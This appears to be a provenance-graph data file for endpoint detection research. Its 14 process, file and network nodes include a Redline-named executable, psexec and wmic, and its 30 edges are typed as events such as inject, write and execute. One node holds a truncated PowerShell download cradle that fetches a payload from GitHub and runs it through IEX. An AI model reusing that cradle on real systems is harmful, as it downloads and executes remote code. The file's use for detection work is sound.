14
MP*-360TS_Setup_Mini_WW.OG.CPI202304_6.6.0.1054.exe
MP*-qgcrmeck.exe
MF-C:\Users\admin\AppData\Local\Temp\Document
TP-Dkeyauth.tmp 
MP-installd.exe
TP-Redline Activate.exe 
MF-temp\psexec.exe
TP*-DllHost.exe
TP*-wmic.exe
SO-https://abit.ly/lqy1dx#test@poscoplantec.co.kr
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MF-\Users\User\29630.ico
TP-services.exe
MP-olsptrs.exe 
30
0 1 FR-1
0 2 RD-1
1 2 WR-2
0 3 FR-1
1 3 IJ-2
3 2 RD-2
0 4 FR-1
1 4 UK-2
0 5 UK-1
3 6 WR-2
7 2 RD-3
3 7 IJ-2
7 6 WR-3
8 2 EX-4
3 8 IJ-2
8 6 WR-4
7 8 IJ-3
3 9 ST-2
9 7 RF-2
8 9 ST-4
3 10 ST-2
10 7 RF-2
10 8 RF-2
3 11 EX-2
7 11 UK-3
12 2 CD-4
3 12 IJ-2
12 6 WR-4
8 12 UK-4
13 6 UK-4

